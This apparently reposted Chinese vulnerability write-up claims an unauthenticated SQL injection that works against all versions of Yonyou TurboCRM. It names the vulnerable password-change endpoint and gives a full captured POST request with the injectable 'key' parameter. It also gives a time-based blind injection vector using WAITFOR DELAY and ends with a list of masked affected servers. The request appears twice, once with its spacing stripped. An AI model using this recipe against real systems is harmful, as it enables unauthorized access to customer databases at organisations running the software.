用友php漏洞,用友CRM注入漏洞(无需登录通杀所有版本)

用友TurboCRM存在通用sql注入。http://**.**.**.**:8081/login/login.php如下图找到找回密码页

用友php漏洞,用友CRM注入漏洞(无需登录通杀所有版本)_第1张图片

访问http://**.**.**.**:8081/login/changepswd.php?orgcode=1&loginname=system

用友php漏洞,用友CRM注入漏洞(无需登录通杀所有版本)_第2张图片

输入信息抓包

POST /login/changepswd.php?orgcode=1&loginname=system HTTP/1.1

Host: **.**.**.**:8081

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

X-Requested-With: XMLHttpRequest

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Referer: http://**.**.**.**:8081/login/changepswd.php?orgcode=1&loginname=system

Content-Length: 95

Cookie: PHPSESSID=8a4jg4pb034v5dcbachfllljd1

Connection: keep-alive

Pragma: no-cache

Cache-Control: no-cachesubmit=1&oldpassword=aaaaa&password=aaaaaa&confirmpswd=aaaaaa&orgcode=1&loginname=system&key=-1

1

2

3

4

5

6

7

8

9

10

11

12

13

14

POST/login/changepswd.php?orgcode=1&loginname=systemHTTP/1.1

Host:**.**.**.**:8081

User-Agent:Mozilla/5.0(WindowsNT6.1;WOW64;rv:32.0)Gecko/20100101Firefox/32.0

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language:zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding:gzip,deflate

X-Requested-With:XMLHttpRequest

Content-Type:application/x-www-form-urlencoded;charset=UTF-8

Referer:http://**.**.**.**:8081/login/changepswd.php?orgcode=1&loginname=system

Content-Length:95

Cookie:PHPSESSID=8a4jg4pb034v5dcbachfllljd1

Connection:keep-alive

Pragma:no-cache

Cache-Control:no-cachesubmit=1&oldpassword=aaaaa&password=aaaaaa&confirmpswd=aaaaaa&orgcode=1&loginname=system&key=-1

用友php漏洞,用友CRM注入漏洞(无需登录通杀所有版本)_第3张图片

算法:Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--影响**.**.**.****.**.**.****.**.**.****.**.**.**http://**.**.**.**:8888**.**.**.****.**.**.**:9091**.**.**.**:9091**.**.**.**:8081**.**.**.**:8088**.**.**.****.**.**.**:8001**.**.**.****.**.**.****.**.**.****.**.**.****.**.**.**:8088**.**.**.****.**.**.****.**.**.****.**.**.****.**.**.****.**.**.****.**.**.****.**.**.****.**.**.****.**.**.**:8080**.**.**.**:9036**.**.**.**:8080**.**.**.****.**.**.****.**.**.**:8088**.**.**.**:8080**.**.**.**:8080**.**.**.**:9000**.**.**.****.**.**.**:8088**.**.**.**:8080

你可能感兴趣的:(用友php漏洞)